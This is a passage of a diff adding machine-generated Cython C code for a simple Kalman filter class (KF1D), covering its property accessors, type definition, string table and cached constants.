(likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + return o; +} + +static void __pyx_tp_dealloc_6common_6kalman_18simple_kalman_impl_KF1D(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6common_6kalman_18simple_kalman_impl_KF1D) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x0_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x0_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x1_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x1_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_K0_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_K0_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_K1_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_K1_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_1(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_1(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_1(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_1(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_1(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_1(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_0(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_0(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_1(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_1(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_2(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_2(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_3(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_1__get__(o); +} + +static int __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_3(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyMethodDef __pyx_methods_6common_6kalman_18simple_kalman_impl_KF1D[] = { + {"update", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_3update, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6common_6kalman_18simple_kalman_impl_KF1D[] = { + {(char *)"x", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x, (char *)0, 0}, + {(char *)"x0_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x0_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x0_0, (char *)0, 0}, + {(char *)"x1_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_x1_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_x1_0, (char *)0, 0}, + {(char *)"K0_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_K0_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_K0_0, (char *)0, 0}, + {(char *)"K1_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_K1_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_K1_0, (char *)0, 0}, + {(char *)"A0_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_0, (char *)0, 0}, + {(char *)"A0_1", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_1, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A0_1, (char *)0, 0}, + {(char *)"A1_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_0, (char *)0, 0}, + {(char *)"A1_1", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_1, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A1_1, (char *)0, 0}, + {(char *)"C0_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_0, (char *)0, 0}, + {(char *)"C0_1", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_1, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_C0_1, (char *)0, 0}, + {(char *)"A_K_0", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_0, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_0, (char *)0, 0}, + {(char *)"A_K_1", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_1, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_1, (char *)0, 0}, + {(char *)"A_K_2", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_2, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_2, (char *)0, 0}, + {(char *)"A_K_3", __pyx_getprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_3, __pyx_setprop_6common_6kalman_18simple_kalman_impl_4KF1D_A_K_3, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6common_6kalman_18simple_kalman_impl_KF1D_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6common_6kalman_18simple_kalman_impl_KF1D}, + {Py_tp_methods, (void *)__pyx_methods_6common_6kalman_18simple_kalman_impl_KF1D}, + {Py_tp_getset, (void *)__pyx_getsets_6common_6kalman_18simple_kalman_impl_KF1D}, + {Py_tp_init, (void *)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_6common_6kalman_18simple_kalman_impl_KF1D}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6common_6kalman_18simple_kalman_impl_KF1D_spec = { + "common.kalman.simple_kalman_impl.KF1D", + sizeof(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6common_6kalman_18simple_kalman_impl_KF1D_slots, +}; +#else + +static PyTypeObject __pyx_type_6common_6kalman_18simple_kalman_impl_KF1D = { + PyVarObject_HEAD_INIT(0, 0) + "common.kalman.simple_kalman_impl.""KF1D", /*tp_name*/ + sizeof(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6common_6kalman_18simple_kalman_impl_KF1D, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6common_6kalman_18simple_kalman_impl_KF1D, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6common_6kalman_18simple_kalman_impl_KF1D, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6common_6kalman_18simple_kalman_impl_KF1D, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_n_s_A, __pyx_k_A, sizeof(__pyx_k_A), 0, 0, 1, 1}, + {&__pyx_n_s_C, __pyx_k_C, sizeof(__pyx_k_C), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_n_s_K, __pyx_k_K, sizeof(__pyx_k_K), 0, 0, 1, 1}, + {&__pyx_n_s_KF1D, __pyx_k_KF1D, sizeof(__pyx_k_KF1D), 0, 0, 1, 1}, + {&__pyx_n_s_KF1D___reduce_cython, __pyx_k_KF1D___reduce_cython, sizeof(__pyx_k_KF1D___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_KF1D___setstate_cython, __pyx_k_KF1D___setstate_cython, sizeof(__pyx_k_KF1D___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_KF1D_update, __pyx_k_KF1D_update, sizeof(__pyx_k_KF1D_update), 0, 0, 1, 1}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s__11, __pyx_k__11, sizeof(__pyx_k__11), 0, 0, 1, 1}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_kp_s_common_kalman_simple_kalman_impl, __pyx_k_common_kalman_simple_kalman_impl, sizeof(__pyx_k_common_kalman_simple_kalman_impl), 0, 0, 1, 0}, + {&__pyx_n_s_common_kalman_simple_kalman_impl_2, __pyx_k_common_kalman_simple_kalman_impl_2, sizeof(__pyx_k_common_kalman_simple_kalman_impl_2), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dict_2, __pyx_k_dict_2, sizeof(__pyx_k_dict_2), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_meas, __pyx_k_meas, sizeof(__pyx_k_meas), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle_KF1D, __pyx_k_pyx_unpickle_KF1D, sizeof(__pyx_k_pyx_unpickle_KF1D), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_state, __pyx_k_state, sizeof(__pyx_k_state), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_use_setstate, __pyx_k_use_setstate, sizeof(__pyx_k_use_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_x0, __pyx_k_x0, sizeof(__pyx_k_x0), 0, 0, 1, 1}, + {&__pyx_n_s_x0_0, __pyx_k_x0_0, sizeof(__pyx_k_x0_0), 0, 0, 1, 1}, + {&__pyx_n_s_x1_0, __pyx_k_x1_0, sizeof(__pyx_k_x1_0), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + return 0; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xfddd3d9, 0xdbf7d68, 0x3439d7a): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + */ + __pyx_tuple_ = PyTuple_Pack(3, __pyx_int_266195929, __pyx_int_230653288, __pyx_int_54762874); if (unlikely(!__pyx_tuple_)) __PYX_ERR(2, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple_); + __Pyx_GIVEREF(__pyx_tuple_); + + /* "common/kalman/simple_kalman_impl.pyx":22 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + * + * def update(self, meas): # <<<<<<<<<<<<<< + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + */ + __pyx_tuple__3 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_meas, __pyx_n_s_x0_0, __pyx_n_s_x1_0); if (unlikely(!__pyx_tuple__3)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__3); + __Pyx_GIVEREF(__pyx_tuple__3); + __pyx_codeobj__4 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__3, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_kalman_simple_kalman_impl, __pyx_n_s_update, 22, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__4)) __PYX_ERR(0, 22, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_tuple__5 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_state, __pyx_n_s_dict_2, __pyx_n_s_use_setstate); if (unlikely(!__pyx_tuple__5)) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__5); + __Pyx_GIVEREF(__pyx_tuple__5); + __pyx_codeobj__6 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__5, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__6)) __PYX_ERR(2, 1, __pyx_L1_error) + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) + */ + __pyx_tuple__7 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__7)) __PYX_ERR(2, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__7); + __Pyx_GIVEREF(__pyx_tuple__7); + __pyx_codeobj__8 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__7, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 16, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__8)) __PYX_ERR(2, 16, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __pyx_unpickle_KF1D(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__9 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + __pyx_codeobj__10 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__9, __pyx_empty_tuple, __pyx_empty_tuple, 